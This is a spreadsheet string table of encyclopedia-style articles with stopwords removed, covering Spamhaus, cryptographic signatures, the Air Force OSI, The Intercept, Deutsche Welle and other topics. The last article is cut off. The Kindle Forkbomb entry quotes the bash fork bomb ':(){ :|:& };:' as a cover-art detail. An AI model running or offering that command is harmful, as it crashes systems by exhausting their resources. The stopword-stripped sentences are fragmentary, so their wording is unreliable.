    <t>spamhaus project international organisation based principality andorra, founded 1998 steve linford track email spammers spam-related activity. name spamhaus, pseudo-german expression, coined linford refer internet service provider, firm, spams knowingly provides service spammers. anti-spam lists spamhaus project responsible compiling several widely used anti-spam lists. many internet service providers email servers lists reduce amount spam reaches users. 2006, spamhaus services protected million email users, including european parliament, army, white house microsoft, billions spam emails day.spamhaus distributes lists form dns-based blacklists (dnsbls) whitelists (dnswls). lists offered free public service low-volume mail server operators internet. commercial spam filtering services sites large numbers queries must instead sign rsync-based feed dnsbls, spamhaus calls datafeed service. spamhaus outlines dnsbl technology works document called understanding dnsbl filtering.the spamhaus block list (sbl) targets "verified spam sources (including spammers, spam gangs spam support services)." goal list addresses belonging known spammers, spam operations, spam-support services. sbl's listings partially based rokso index known spammers. exploits block list (xbl) targets "illegal party exploits, including open proxies, worms/viruses built-in spam engines, virus-infected servers types trojan-horse exploits." that list known open proxies exploited computers used send spam viruses. includes information gathered spamhaus well contributing dnsbl operations composite blocking list (cbl). policy block list (pbl) similar dialup users list. lists dynamic addresses also static addresses sending email directly third-party servers. examples isp's core routers, corporate users required policy send email company servers, unassigned addresses. much data provided spamhaus organizations control address space, typically isps. domain block list (dbl) released march 2010 list domain names, domain blocklist rhsbl. lists spam domains including spam payload urls, spam sources senders ("right-hand side"), known spammers spam gangs, phish, virus malware-related sites. later added zone "abused shortners", common spammers insert links spam emails. botnet controller list (bcl) released june 2012 list addresses. lists addresses spamhaus believes operated cybercriminals exclusive purpose hosting botnet command&amp;control infrastructure. such infrastructure commonly used cybercriminals control malware infected computers. composite snowshoe (css) automatically produced dataset addresses involved sending low-reputation email. listings based helo greetings without record, generic looking rdns fake domains, could indicate spambots server misconfiguration. part sbl. spamhaus white list (swl) released october 2010 whitelist ipv4 ipv6 addresses. intended allow mail servers separate incoming email traffic categories: good, unknown. only verified legitimate senders clean reputations approved whitelisting strict terms keeping spamhaus whitelist account. domain white list (dwl) released october 2010 whitelist domain names. enables automatic certification domains dkim signatures. only verified legitimate senders clean reputations approved whitelisting strict terms keeping whitelist account. spamhaus also provides combined lists. sbl+xbl second called zen, combines spamhaus address-based lists. register known spam operations spamhaus register known spam operations (rokso) database spammers spam operations terminated three isps spamming. contains publicly sourced information persons, domains, addresses aliases.the rokso database allows isps screen customers, ensuring rokso-listed spammers find difficult hosting. listing rokso also means addresses associated spammer (his domains, sites, servers, etc.) listed spamhaus "under control rokso-listed spammer" whether spam coming preemptive measure). there special version rokso, available enforcement agencies, containing data hundreds spam gangs, evidence, logs information illegal activities gangs, sensitive publish public part rokso. don't route peer list spamhaus don't route peer (drop) list text file delineating cidr blocks stolen otherwise "totally controlled spammers 100% spam hosting operations". small subset sbl, include address ranges registered isps sublet spammers, network blocks wholly used spammers. intended incorporated firewalls routing equipment drop network traffic listed blocks. drop webpage states data free download use. 2012 spamhaus offered feed drop data. companies spamhaus group consists number independent companies focus different aspects spamhaus anti-spam technology provide services based around core spamhaus project slu, not-for-profit company based andorra tracks spam sources cyber threats phishing, malware botnets publishes free dnsbls. commercial services managed british data delivery company spamhaus technology ltd., based london manages data distribution services large scale spam filter systems. awards national cyber forensics training alliance 2008 cyber crime fighter award internet service providers association's internet hero 2003 award greatest contribution anti-spam last years presented spamhaus virus bulletin magazine. conflicts e360 lawsuit september 2006, david linhardt, owner-operator american bulk-emailing company "e360 insight llc", filed suit spamhaus illinois blacklisting mailings. spamhaus case moved state court u.s. federal district court northern district illinois asked case dismissed lack jurisdiction. court, presided judge charles kocoras, proceeded case spamhaus without considering jurisdiction issue, prompting british derek wyatt call judge suspended office. objection jurisdiction examined, spamhaus refused participate u.s. case withdrew counsel. however, spamhaus deemed court "technically accepted jurisdiction" initially responded all, judge, angry spamhaus walked court, awarded e360 default judgement totaling us$11,715,000 damages. spamhaus subsequently announced would ignore judgement default judgements issued u.s. courts without trial "have validity u.k. cannot enforced british legal system".following ruling favour, e360 filed motion attempt force icann remove domain records spamhaus default judgement satisfied. this raised international issues regarding icann's unusual position american organization worldwide responsibility domain names, icann protested neither ability authority remove domain records spamhaus, uk-based company. october 2006, judge kocoras issued ruling denying e360's motion icann, stating opinion "there indication icann [is] [an] independent entit[y] [from spamhaus], thus preventing conclusion [it] acting concert" spamhaus court authority icann matter. court ruled removing spamhaus's domain name registration remedy "too broad warranted case", would "cut lawful online activities spamhaus existing domain name, contravention" default judgment. kocoras concluded, "[w]hile condone tolerate noncompliance valid order court [i.e., spamhaus' refusal satisfy default judgement] neither impose sanction correspond gravity offending conduct".in 2007, chicago firm jenner block took spamhaus's case bono publico appealed ruling. u.s. federal court appeals seventh circuit vacated damages award remanded matter back district court extensive inquiry determine damages. january 2008, e360 insight filed bankruptcy closed down, citing astronomical legal bills associated court case reason demise.in 2010, judge kocoras reduced $11.7 million damages award $27,002—$1 tortious interference prospective economic advantage, claims defamation, $27,000 "existing contracts".both parties appealed, e360's case increasing damages sharply criticized judge richard posner seventh circuit: never seen incompetent presentation damages case," posner said. "it's incompetent, grotesque. you've damages jumping around million $130 million $122 million million. fact, damages probably zero." september 2011 court reduced damages award total, ordered plaintiff e360 costs appeal defence. spamhaus versus nic.at june 2007, spamhaus requested national domain registry austria, nic.at, suspend number domains, claiming registered anonymously phishing gangs illegal bank phishing purposes. registry nic.at rejected request argued would break austrian suspending domains, even though domains used criminal purposes, demanded proof domains registered false identities. time domains continued phish holders accounts european banks. finally, spamhaus mail server nic.at spam blacklist sbl's policy "knowingly providing spam support service profit" several days caused interference mail traffic nic.at. phishing domains question since deleted suspended providers. blocking google docs august 2010, spamhaus added google-controlled addresses used google docs spam list, google docs large source uncontrolled spam. google quickly fixed problem spamhaus removed listing. though initially wrongly reported press used gmail, later clarified google docs blocked. cyberbunker dispute ddos attack march 2013, cyberbunker, internet provider named former headquarters surplus nato bunker netherlands "offers anonymous hosting anything except child porn anything related terrorism" added spamhaus blacklist used email providers weed spam. shortly afterwards, beginning march spamhaus target distributed denial service (ddos) attack exploiting long-known vulnerability domain name system (dns) permits origination massive quantities messages devices owned others using address spoofing. devices exploited attack simple cable converter connected internet. attack previously unreported scale (peaking gbit/s; average large-scale attack might reach gbit/s, largest previous publicly reported attack gbit/s) launched spamhaus's servers; march 2013 effects attack lasted week. steve linford, chief executive spamhaus, said withstood attack, using assistance internet companies google absorb excess traffic. linford also claimed attack investigated five different national cyber-police-forces around world, chosen remain anonymous avoid similar attacks infrastructure. spamhaus also hired cloudflare, ddos mitigation company, assist distributing internet services across cloudflare's worldwide network, focus attack redirected companies provide cloudflare's network connections.spamhaus alleged cyberbunker, cooperation "criminal gangs" eastern europe russia, behind attack; cyberbunker respond bbc's request comment allegation; however, sven olaf kamphuis, owner cyberbunker, posted facebook account march anons, could little help shutting illegal slander blackmail censorship project 'spamhaus.org,' thinks dictate views internet." according york times kamphuis also claimed spokesman attackers, said message aware largest ddos attacks world publicly seen", cyberbunker retaliating spamhaus "abusing influence". added security researcher kaminsky said "you can’t stop flood deal problem find people arrest them".the attack attributed network engineers anonymous group unhappy spamhaus, later identified victims attack stophaus, loosely organized group "bulletproof spam malware hosters".on april 2013, owner cyberbunker, sven olaf kamphuis, arrested spain part attack spamhaus. held jail days pending extradition netherlands, released pending trial, ultimately found guilty sentenced days jail, remaining days suspended.the british national cyber crime unit revealed london schoolboy secretly arrested part suspected organised crime gang responsible ddos attacks. briefing document giving details schoolboy's alleged involvement states: "the suspect found computer systems open logged various virtual systems forums. subject significant amount money flowing bank account. financial investigators process restraining monies." ames spamhaus project 2014, spamhaus sued california-based entrepreneurs craig ames mcgee, involved bulk email marketing services business, initially corporation called blackstar media llc, later employees blackstar marketing, subsidiary english company adconion media group limited, bought blackstar media april 2011. although initial motion spamhaus strike claims failed, ultimately prevailed claimants dropped case paid spamhaus' legal costs. also anti-spam techniques (email) brian haberstroh comparison blacklists news.admin.net-abuse.email spamcop references external links official website</t>
  </si>
  <si>
    <t>Delegated credential</t>
  </si>
  <si>
    <t>delegated credential short-lived certificate used improve security faster recovery private leakage, without increasing latency handshake. currently ietf internet draft, cloudflare facebook, browser support firefox. motivation modern websites services content delivery networks (cdns), servers potentially distributed world, order respond user's request fast possible, alongside services cdns provide ddos mitigation. however, order establish secure connection, server required prove possession private associated certificate, serves chain trust linking public trusted party. trusted party normally certificate authority (ca). issue digital certificates expiration time, usually months year. server's responsibility renew certificate close expiration date. knowledge private associated valid certificate devastating site's security, allows man-in-the-middle attacks, malicious entity impersonate user legitimate server. therefore, private keys kept secure, preferably distributed every server cdn. specifically, private compromised, corresponding certificate optimally revoked, browsers longer support certificate. certificate revocation main drawbacks. firstly, current revocation methods work well across browsers, users risk; secondly, upon revocation, server needs quickly fetch valid certificate deploy across mirrors. design delegated credential short-lived (from hours days) certificate's owner delegates server tls. fact signature: certificate's owner uses certificate's private sign delegated public key, expiration time. given delegated credential, browser supports verify server's authenticity verifying delegated certificate verify certificate itself. advantages this approach many advantage current solutions: delegated credentials short-lived, private keys changed frequently. therefore, even particular delegated credential compromised without certificate owner knowing compromised credential could abused short time. revocation needed stolen certificates. certificate owner need expose private servers, rather periodically supply delegated credentials. therefore, certificate owner maintain exclusive control private (and even store hsm) using third-party servers. delegated credential key, experiment algorithms ed25519. this facilitate cryptographic agililty. references</t>
  </si>
  <si>
    <t>Deniable authentication</t>
  </si>
  <si>
    <t>cryptography, deniable authentication refers message authentication participants participants confident authenticity messages, cannot proved third party event.in practice, deniable authentication parties achieved message authentication codes (macs) making sure attacker able decrypt messages, would also know part protocol, would thus able forge authentic-looking messages. example, off-the-record messaging (otr) protocol, keys derived asymmetric decryption cryptographic hash function. addition that, protocol also reveals used keys part next message, already used authenticate previously received messages, re-used. also deniable encryption plausible deniability malleability references</t>
  </si>
  <si>
    <t>Department of the Air Force Office of Special Investigations</t>
  </si>
  <si>
    <t>department force office special investigations (osi) u.s. federal enforcement agency reports directly secretary force. also u.s. force field operating agency administrative guidance oversight inspector general department force. federal statute, provides independent criminal investigative, counterintelligence protective service operations worldwide outside traditional military chain command. proactively, identifies, investigates, neutralizes serious criminal, terrorist, espionage threats personnel resources force, space force, u.s. department defense, thereby protecting national security united states. overview office special investigations capabilities: protect critical technologies information detect mitigate threats provide global specialized services conduct major criminal investigations engage foreign adversaries threats offensivelyosi's cornerstone vigorously solve crime, protect secrets, warn threats, exploit intelligence opportunities, operate cyber. investigates wide variety serious offenses espionage, terrorism, crimes property, violence people, larceny, computer hacking, acquisition fraud, drug distribution, financial misdeeds, military desertion, corruption contracting process, illegal activity undermines mission force, space force, dod. 2007, 2,900 employees. after pilot training, remains second-most requested career choice force officers. history office special investigations founded 1948 suggestion congress consolidate investigative activities force. secretary force stuart symington created field operating agency patterned federal bureau investigation (fbi). appointed special agent joseph francis carroll, senior official assistant director edgar hoover, first commander charged providing independent, unbiased centrally directed investigations criminal activity force. carroll later became first director defense intelligence agency office special investigations officially established chief staff united states force carl spaatz general order january 1948. this order appointed joseph francis carroll commander. official letter carl spaatz april 1948 forth functions responsibilities office special investigations, provide competent, centrally directed special investigations service force activities", including investigation major offenses "fraud and/or conspiracy, arson, black-market operations, bribery, burglary, embezzlement, forgery, larceny, perjury, robbery, smuggling, similar offenses major violations articles war, federal statute, and/or pertinent directives".a chief staff united states force hoyt vandenberg signed general order july 1948 empowered office special investigations carry counterintelligence activity including detection espionage, sabotage, treason, sedition, subversion, disloyalty, disaffection. also specifically stated would responsible investigations formerly performed usaf counterintelligence corps.1 august 1948 considered operational date office special investigations.the military investigative service designated enforcement agency created 1948. 1976 reservist noted discrepancy called attention command, quickly sought received official recognition designation official enforcement agency. organization addition headquarters quantico, seven field investigations regions aligned force major commands unified combatant commands region force materiel command, force special operations command, force reserve command region combat command, united states central command, united states southern command, united states strategic command, 12th force, 16th force region mobility command, united states transportation command, united states special operations command, united states central command, force district washington, pentagon force protection agency region education training command, force, 19th force, university region united states forces europe forces africa, united states africa command, united states european command, force region pacific forces, united states indo-pacific command, special operations command pacific, force, force, 11th force region united states space force, force global strike command, united states northern command, force, 14th force, 20th force, united states force academyin addition, several specialized investigative, training, supporting units: office special projects (pj) office procurement fraud (pf) force support squadron (fss) u.s. force special investigations academy (usafsia) investigations, collections, operations nexus (icon) centerosi designated executive agency department defense cyber crime center. while regions serve investigative needs aligned major commands, units personnel remain independent commands. chains command region directly headquarters. such organizational independence intended ensure unbiased investigations. regional level subordinate units called field investigations squadrons, detachments, operating locations. there units worldwide including, jordan, saudi arabia, yemen, iraq, afghanistan middle east locations. operations threat detection manages offensive defensive activities detect, counter destroy effectiveness hostile intelligence services terrorist groups target force space force. these efforts include investigating crimes espionage, terrorism, technology transfer computer infiltration. this mission aspect also includes providing personal protection senior force space force leaders officials, well supervising extensive antiterrorism program geographic areas heightened terrorist activity.criminal investigations vast majority osi's investigative activities pertain felony crimes including murder, robbery, rape, assault, major burglaries, drug trafficking, offenses, arson, black market activities, serious criminal activities. january 2014, investigating synthetic drugs abuse, uncovered facts cheating monthly proficiency exams 341st missile wing malmstrom force base montana involving officers.economic crime investigations significant amount investigative resources assigned fraud economic crime) investigations. these include violations public trust involving force space force contracting matters, appropriated nonappropriated funds activities, computer systems, allowance matters, environmental matters, acquiring disposing force space force property, major administrative irregularities. uses fraud surveys determine existence, location extent fraud force space force operations programs. also provides briefings base command-level resource managers help identify prevent fraud involving force, space force, department defense (dod) resources. information operations force space force countering global security threat information systems. osi's role support information operations recognizes future threats force space force, response threats occur cyberspace. osi's support information operations comes many forms. osi's computer crime investigators provide rapid worldwide response intrusions force space force systems.technology protection desires potential adversaries acquire mimic technological advances force space force heightened need protect critical force space force technologies collateral data. research technology protection program provides focused, comprehensive counterintelligence core mission investigative services safeguard force space force technologies, programs, critical program information, personnel facilities.specialized services numerous specialists invaluable successful resolution investigations. they include technical specialists, polygraphers, behavioral scientists, computer experts forensic advisers.department defense cyber crime center department defense cyber crime center (dc3) established organic entity within 1998. formation expanded operational scope computer forensic lab, established 1995 first kind within dod. provides digital multimedia forensics, cyber investigative training, research, development, test evaluation, cyber analytics following mission areas: information assurance critical infrastructure protection, enforcement counterintelligence, document media exploitation, counterterrorism. national cyber center serves operational focal point defense industrial base cybersecurity information assurance program (dib cs/ia program). training physical requirements special agent recruits—whether officer, enlisted, civilian—receive entry-level training u.s. department homeland security’s federal enforcement training center (fletc) glynco, georgia. training requires recruit meet various physical requirements. candidates attend 12-week criminal investigator training program federal enforcement trainees. that course followed eight weeks agency-specific coursework, u.s. force special investigations academy (usafsia), co-located fletc. both courses offer agents training firearms weapons, defensive tactics, forensics, surveillance surveillance detection, antiterrorism techniques, crime scene processing, interrogations interviews, court testimony, military federal law. upon graduation, special agents spend one-year probationary period field. upon successful completion, agents receive specialized training economic crime, antiterrorism service, counterintelligence, computer crimes sophisticated criminal investigative capabilities. others attend weeks technical training acquire electronic, photographic skills required perform technical surveillance countermeasures. experienced agents selected polygraph duties attend 14-week department defense course.each recruit expected participate following exercises: flexibility, bench press, 1.5-mile (2.4 run/walk agility run. students tested determine fitness level, test gender normed. special agents expected remain physically throughout employment must maintain force physical fitness standards defined force instruction (afi) 36-2905. firearms agents' primary firearm 9×19mm sauer p228, though weapons available depending needs mission, including mp5. agents also carry personally owned weapon (pow) approved list manufacturers 9mm. however, agents must qualify government-issued sauer p228. popular culture 2008 film eagle eye, actress rosario dawson played special agent perez. 2013 film mirage men, richard doty, retired special agent, played documentary investigation ufos 1952 1969. seventh episode season 1997 television series stargate sg-1, sg-1 team member teal'c given permission live off-base general, subsequently investigated officer 'colonel kendrick' stopping otherwise becoming involved crimes neighbourhood. first episode season 2013 television series americans, agents phillip jennings (matthew rhys) emmett connors posed "air force security" wore badges. force academy informant program december 2013, colorado springs gazette reported operating confidential informant program u.s. force academy (usafa), colorado springs, recruited cadets gather information rule breakers criminals. program left recruits take responsibility initial incident trouble subsequent rule-breaking behavior resulting directions agents. cadets participated said, "...it effective. convictions drugs, convictions sexual assault. making difference. motivating, especially sexual assaults. could victims sense peace."in response, usafa superintendent oversight program academy. though superintendent aware operations, still command control program. failure report information 2017, former airman devin kelley shot killed people wounded others first baptist church sutherland springs, according media department defense inspector general report, kelly convicted assault discharged force. this information supposed reported fbi's criminal justice information services division. occurred, kelley would unable purchase firearm legally federal firearms license (ffl). failed send data four times. according secaf, "the failure reporting kelley's criminal history isolated event unique case holloman afb, investigation unfolded." also list commanders force office special investigations list united states federal enforcement agenciesmilitary criminal investigative organizations united states army criminal investigation command (usacidc cid) united states army counterintelligence (aci) naval criminal investigative service (ncis) defense criminal investigative service (dcis) coast guard investigative service (cgis)department force secretary force inspector general department force judge advocate general's corps, u.s. force united states force security forces department force police u.s. force intelligence, surveillance reconnaissance agency 6004th intelligence service squadronother special agent federal enforcement training centers department defense cyber crime center (dc3) criminal investigation task force (citf) internet crimes against children (icac) task force arlen specter, former u.s. senator pennsylvania special agent herbert bateman, former member u.s. house representatives virginia's congressional district special agent donald nichols, former special agent references external links official website</t>
  </si>
  <si>
    <t>Digital Signature Standard</t>
  </si>
  <si>
    <t>digital signature standard (dss) federal information processing standard specifying suite algorithms used generate digital signatures established u.s. national institute standards technology (nist) 1994. four revisions initial specification released: fips 186-1 1996, fips 186-2 2000, fips 186-3 2009, fips 186-4 2013.it defines digital signature algorithm, contains definition signatures based definitions contained within pkcs version american national standard x9.31 additional requirements, contains definition elliptic curve digital signature algorithm based definition provided american national standard x9.62 additional requirements recommended elliptic curves. also approves three algorithms. references</t>
  </si>
  <si>
    <t>The Project Formerly Known As Kindle Forkbomb</t>
  </si>
  <si>
    <t>project formerly known kindle forkbomb work done swiss-austrian-american known ubermorgen. artists known creative digital media, combined means performance various offline medium convey ideas. project showcased ubermorgen's website "http://ubermorgen.com/uuuuuuuntitled.com/" initially shown kunsthal aarhus show "systemics think (or, next world library)" gallery berlin, 2013. project overview project's name: "the project formerly known kindle forkbomb" broken better understand meaning behind work. forkbomb term used computing, describing attack computer process continuously self-replicates machine's resources depleted system crashes. process outline project depicts machine process strips comments youtube, uses algorithm compile comments finally titling work video title respective uploader make book. this book uploaded kindle publishing service placed kindle store. after, machine monitors books making sure enough sales made keep alive store. thriving store machine directed purchase copies, thus prolonging shelf-life. purpose using process artists' message intent show easily could clog store rapidly multiplying number books (hence kindle forkbomb). this example critique digital world problems poses. while merely demonstration, makes easier visualize world live artists' remarks ubermorgen describes media created human-machine combination creation genre decentralized fiction writing. artist group says books compressed form contemporary world, describe snapshot frozen time. this type work form sometimes referred "uncreative" spurred famous writer kenneth goldsmith's efforts uncreative writing. published books some examples works produced project: show country begins they sosodni riottto it.. "sang" missed grabbed can't jasmmmm evieraa marge think caresit page cptmole kenslov funny nrlnick kencalsone thing note cover books feature uploader, video title underneath everything text string ":(){ :|:&amp; };:" bash shell version computer forkbomb. following reference link takes website allowed read full version books. similar projects project similar stephanie barber american artist uses many forms media art. project relates kindle forkbomb book titled night moves. this book grouping youtube comments seger's song night moves. references</t>
  </si>
  <si>
    <t>Detached signature</t>
  </si>
  <si>
    <t>detached signature type digital signature kept separate signed data, opposed bundled together single file. also signature references free software foundation (1999). "making verifying signatures: detached signatures". privacy handbook. retrieved 2010-01-25. microsoft corporation (2016-10-16). "detached signatures". msdn library. retrieved 2019-01-25.</t>
  </si>
  <si>
    <t>The Iran Cables (2019)</t>
  </si>
  <si>
    <t>iran cables comprehensive reporting project intercept partnership york times detailing level influence iran iraq since 2003 united states invasion iraq. this series in-depth articles published november 2019, based leak pages iranian intelligence reports provided intercept anonymous source. references</t>
  </si>
  <si>
    <t>The Intercept</t>
  </si>
  <si>
    <t>intercept american non-profit news organization founded glenn greenwald, jeremy scahill, laura poitras, funded ebay co-founder pierre omidyar. editor betsy reed. also publishes four podcasts: intercepted (hosted jeremy scahill), deconstructed, murderville somebody. intercept published english since founding, portuguese since 2016 launch brazilian edition staffed local team brazilian journalists. history intercept founded journalists glenn greenwald jeremy scahill filmmaker laura poitras. launched february 2014 first look media, funded billionaire ebay founder pierre omidyar. publication initially reported documents released edward snowden. co-founders greenwald poitras subsequently left amid public disagreements leadership direction organization. awards february 2016, intercept national magazine award columns commentary writer barrett brown, finalist public interest category series sharon lerner called teflon toxin, exposed dupont harmed public workers toxic chemicals. april 2016, intercept people's voice award best news website twentieth annual webby awards. 2016, intercept three awards york press club awards journalism. site awarded "special event reporting" category investigative reporting u.s. drone program, "humor" category series columns writer barrett brown, "documentary" category short film called, "the surrender"—about former u.s. intelligence analyst stephen jin-woo kim—produced stephen maing, laura poitras, peter maass. september 2016 online news awards, intercept university florida award investigative data journalism drone papers series, investigation secret documents detailing covert u.s. military overseas assassination program.at 2017 online news awards, intercept awards: first feature story fbi's efforts infiltrate bundy family, second, investigative data journalism award "trial terror", project documenting people prosecuted u.s. terrorism since 9/11. year, intercept hillman prize journalism investigative series jamie kalven exposing criminality within chicago police department. news organization also 2017 award "outstanding feature story" sixteenth annual awards reporting environment. judges environmental award praised author sharon lerner piece "the strange case tennie white", described "finely written disturbing investigation contamination injustice near chemical plant mississippi". u.s. government reaction august 2014, u.s. national counterintelligence executive (nce) william evanina confirmed moving forward probe classified documents leaked intercept article revealing details database terrorism suspects, linked people terrorism even known association terrorism group. "it's criminal concerned," said evanina, former special agent counter-terrorism specialty appointed director national intelligence james clapper 2014.in august 2014, reported members u.s. military banned reading intercept. controversies erik wemple, writing washington post, noted conspicuous refusal intercept term "targeted killings" refer u.s. drone program, instead referring drone strikes "assassinations". wemple included glenn greenwald's explanation assassination "the accurate term rather euphemistic term government wants use"; greenwald noted "anyone murdered deliberately away battlefield political purposes assassinated". techcrunch referred story clear evidence "unabashed opposition security hawks".the jewish telegraph agency wrote intercept's founder "has relentlessly criticized israel political leadership, times invoked tropes dual loyalty attacking pro-israel community". site also published podcast titled "the case aipac".politico notes intercept tendency write articles speak negatively democrats. juan thompson scandal february 2016, site appended lengthy corrections five stories reporter juan thompson retracted sixth, charleston church shooter dylann roof, written previous year, focused african-american community. shortly afterward, note editor betsy reed indicated thompson fired recently editors discovered pattern deception" reporting. according reed, "fabricated several quotes stories created fake email accounts used impersonate people, gmail account name".reed apologized readers misquoted. noted thompson's work, using public sources, verifiable. editors alerted downstream users affected stories, promised take similar action fabrication came light.thompson suggested greater problem racism media field. made pseudonyms sources, described "poor black people want names public given situations" would spoken reporter otherwise. "[t]he journalism covers experiences poor black folk journalism others, first look, used differs drastically," argued. also said felt need "exaggerate personal shit order prove worth" intercept given incidents racial bias said witnessed there. when gawker published email, reed said allegations version sent her.he fired intercept early 2016 and, according reed, cooperate investigation actions. reality winner controversy early june 2017, intercept published national security agency document asserts russian intelligence successfully hacked american voter registration poll software company, used information culled phish state election officials. document mailed source inside nsa, reveal identity intercept writers. hour publication, reality winner, 25-year contract employee, arrested federal bureau investigation charged espionage 1917. article bolstered public suspicion russia interfered 2016 election. document states russian intelligence attempted crack log-in information employees vendor providing voter registration software databases states election systems. stated russians successful enough able email election officials, posing employees vendor. according david folkenflik national public radio, "[a]n intercept reporter shared photo papers source, government contractor trusted, seeking validate printout included postmark augusta, ga., microdots, kind computerized fingerprint. contractor told bosses, informed fbi." quickly identified leaker documents.verifying legitimacy leaked documents common journalism practice, protecting third parties harmed incidentally leak published. however, professional media outlets receive documents recordings confidential sources not, practice, share unfiltered primary evidence federal agency review verification, known metadata unique identifiers revealed obvious journalist, source exposed.according fbi, evidence chain arrest winner, young force veteran working georgia pluribus international corporation, contractor, document mailed intercept. intercept criticized unprofessional handling document, indifference source's safety.following arrest winner, intercept released statement saying knowledge identity person provided document". allegations winner, added, "unproven assertions speculation designed serve government's agenda warrant skepticism".nsa whistleblower john kiriakou guantanamo detention camp whistleblower joseph hickman accused reporter accused revealing winner's identity, matthew cole, playing role exposure, which, kiriakou's case, imprisonment.on july 2017, intercept announced parent company, first look media, press freedom defense fund, would provide $50,000 matching funds stand reality, crowd-funding campaign support winner's legal defense, plus separate grant engage second firm assist winner's principal attorneys, augusta-based bell brigham. additionally, wrote editor-in-chief betsy reed, "first look's counsel baruch weiss firm arnold porter kaye scholer support defense efforts continuing represent first look's interests."on august 2018, federal court georgia, winner sentenced agreed-upon five years three months prison violating espionage act. prosecutors said sentence longest ever imposed federal court unauthorized release government information media. winner held federal bureau prisons (fbop)'s federal medical center, carswell fort worth, texas, order receive treatment bulimia close family.on november 2020, laura poitras, founding editors intercept, left company. said fired relation winner controversy. resignation glenn greenwald october 2020, glenn greenwald resigned intercept, saying faced political censorship contractual breaches editors, wrote prevented reporting conduct biden son, hunter, regard china ukraine. rogan experience, greenwald stated thinks colleagues want report anything negative biden desperate trump lose. intercept disputed greenwald's accusations, writing "believes anyone disagrees corrupt, anyone presumes edit words censor", told washington post, absolutely true glenn greenwald asked remove sections critical biden article. asked support claims innuendo corrupt actions biden evidence." leaked data solicit donations 2021, intercept used gableaks solicit donations. greenwald criticized publication exploiting called invasion privacy, said contrasted intercept's origins snowden leaks. response, spokesperson intercept said apologize interest reporting fascist activity." podcasts intercepted intercepted weekly podcast hosted investigative journalist jeremy scahill produced first look media. podcast uses interviews, round table discussions, journalistic narrative present investigative reporting, analysis, commentary topics war, national security, media, environment, criminal justice, government, politics. launched january 2017, show often includes discussion writers, reporters, artists, thinkers. regularly featured intercept editor journalist glenn greenwald well senior correspondent, author, journalist naomi klein. editor-in-chief betsy reed. music show created performed spooky.the premier episode, january 2017, "the clock strikes thirteen, donald trump president" features interview seymour hersh, criticizes media's response alleged russian hacking 2016 u.s. presidential election, calling media went along story, "outrageous". deconstructed deconstructed podcast hosted intercept's washington, d.c. bureau chief ryan grim. show previously hosted british political journalist broadcaster mehdi hasan first years, 2018 2020. grim took permanent host october 2020 hasan began hosting news broadcast peacock. murderville, murderville, hosted liliana segura jordan smith, cover series murders small georgia town enforcement investigation surrounding them. somebody somebody podcast gunshot victim, courtney copeland, found outside chicago police station, controversy around official narrative. american isis american isis podcast hosted journalist trevor aaronson life russell dennison, american convert islam fought died islamic state iraq levant. aaronson interviewed dennison secret last years latter's life. intercept brasil august 2016, intercept launched brazilian version, intercept brasil, edited portuguese, aimed brazilian political news, produced team brazilian journalists. intercept brasil also features translated news english edition.in june 2019, intercept brasil released leaked telegram messages exchanged judge sérgio moro, prosecutor deltan dallagnol operation wash prosecutors. wake reporting, brazilian government january 2020 indicted glenn greenwald cybercrimes charges connection efforts protect sources, legitimacy president jair bolsonaro's election called question, supreme federal court brazil april-june 2021 annulled former president luiz inácio lula silva's 2018 conviction corruption charges. also journalism portal united states portal references further reading external links official website</t>
  </si>
  <si>
    <t>Deutsche Welle</t>
  </si>
  <si>
    <t>deutsche welle (pronounced [ˈdɔʏtʃə ˈvɛlə] (listen); "german wave" german), abbreviated german public, state-owned international broadcaster funded german federal budget. service available languages. dw's satellite television service consists channels english, german, spanish, arabic. work regulated deutsche welle act, meaning content intended independent government influence. member european broadcasting union (ebu).dw offers regularly updated articles news website runs center international media development, akademie. broadcaster's stated goals produce reliable news coverage, provide access german language, promote understanding peoples. also provider live streaming world news viewed website, youtube, various mobile devices digital media players. broadcasting since 1953. headquartered bonn, radio programmes produced. however, television broadcasts produced almost entirely berlin. both locations create content dw's news website. 2019, around 1,500 employees 1,500 freelancers countries work deutsche welle offices bonn berlin. history beginnings dw's first shortwave broadcast took place 1953 address west german president, theodor heuss. june 1953, public broadcasters signed agreement share responsibility deutsche welle. first, controlled nordwestdeutscher rundfunk (nwdr). 1955, nwdr split norddeutscher rundfunk (ndr) westdeutscher rundfunk (wdr), assumed responsibility deutsche welle programming. 1960, deutsche welle became independent public body court ruled broadcasting germany state matter, broadcasting germany part federal government's foreign-affairs function. june 1962, joined national broadcasting station. deutsche welle originally headquartered west german city cologne. after reunification, much government relocated berlin, station's headquarters moved bonn. german reunification with german reunification 1990, radio berlin international (rbi), east germany's international broadcaster ceased exist. some staff joined deutsche welle inherited broadcasting facilities, including transmitting facilities nauen, well rbi's frequencies. (tv) began rias-tv, television station launched west berlin broadcaster rias (radio american sector rundfunk amerikanischen sektor) august 1988; also acquired german educational television network united states. fall berlin wall following year german reunification 1990 meant rias-tv closed down. april 1992, deutsche welle inherited rias-tv broadcast facilities, using start german- english-language television channel broadcast satellite, (tv), adding short spanish broadcast segment following year. 1995, began 24-hour operation hours german, hours english, hours spanish). time, (tv) introduced news studio logo. deutsche welle took former independent radio broadcasting service deutschlandfunk's foreign-language programming 1993, deutschlandfunk absorbed deutschlandradio. addition radio television programming, sponsored published material. example, south-asia department published german heritage: series written south asia programme 1967 1984 published african writers air. both publications transcripts programming. internet presence september 1994, deutsche welle first public broadcaster germany internet presence, initially www-dw.gmd.de, hosted information technology research center. first years, site listed little contact addresses, although dw's news journal broadcast realaudio real's server beginning 1995, süddeutsche zeitung's initial presence, included news articles newspaper, shared site. 1996, evolved news website using dwelle.de; 2001, changed www.dw-world.de, changed 2012, www.dw.de. deutsche welle purchased domain dw.com, previously belonged diamondware, 2013; attempted claim ownership address 2000, without success. eventually moved www.dw.com domain june 2015. according website delivers information topic intuitive navigation organized meet users' expectations. layout offers flexibility feature pictures, videos in-depth reporting day's events multimedia multilingual fashion. they also integrated media center dw.de website making easier users access videos, audios picture galleries dw's multimedia archive reports, programs coverage special issues.dw's news site seven core languages (arabic, chinese, english, german, spanish, portuguese brazil, russian), well mixture news information languages deutsche welle broadcasts. persian became site's eighth focus language 2007. german european news dw's central focus, site also offers background information germany german language courses. deutsch, warum nicht? (literally: german, not?) personal course learning german language, created deutsche welle goethe-institut.in 2003, german government passed "deutsche welle act", defined tri-media organization, making deutsche welle website equal partner dw-tv radio. website available languages, focuses german, english, spanish, russian, brazilian portuguese, chinese, arabic. persian became eighth focus language 2007. march 2009, dw-tv expanded television services asia channels, namely dw-tv asia dw-tv asia+. dw-tv asia (dw-tv asien german) contains hours 